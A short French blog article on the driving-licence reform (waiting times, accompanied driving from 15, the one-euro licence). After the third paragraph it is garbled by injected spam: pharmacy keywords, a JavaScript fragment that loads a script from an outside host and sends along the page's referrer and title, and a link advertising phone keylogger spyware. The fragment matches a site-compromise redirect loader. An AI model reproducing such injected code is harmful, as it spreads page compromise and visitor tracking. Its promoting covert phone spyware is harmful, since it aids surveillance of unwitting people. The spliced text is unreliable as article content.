La réforme du permis de conduire a commencé

Après de nombreuses réunions et concertations, le Ministère de l’Intérieur a dévoilé courant juin les grands axes de la réforme du permis de conduire, suite au « rapport Gilbert » remis au Ministre en avril.

Le point central et prioritaire sur lequel s’attaque cette réforme est le délai d’attente pour passer le permis de conduire. Le délai d’attente est de 98 jours en moyenne sur le plan national, et peut atteindre plus de 5 mois en Ile de France. En réduisant le délai de présentation, on réduit les coûts du permis de conduire.

Le deuxième grand axe de la réforme  est de rendre le permis de conduire accessible plus tôt pour les jeunes. Il s’agit de pouvoir commencer la conduite accompagnée dès 15 ans, et passer l’examen dès 17 ans et demi au lieu de 18 ans. Le Ministère souhaite également renforcer le permis à 1 euro par jour, en rendant le dispositif accessible aux élèves qui ont raté l’examen, et augmenter le plafond de 300€.

  brick and mortar pharmacies in canada }s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »; http://casamariannalivigno.com/non-categorizzato/phone-keylogger-cell-phone-spy-software-spyware-for-iphone-without-jailbreaking/

Non classé

Laisser un commentaire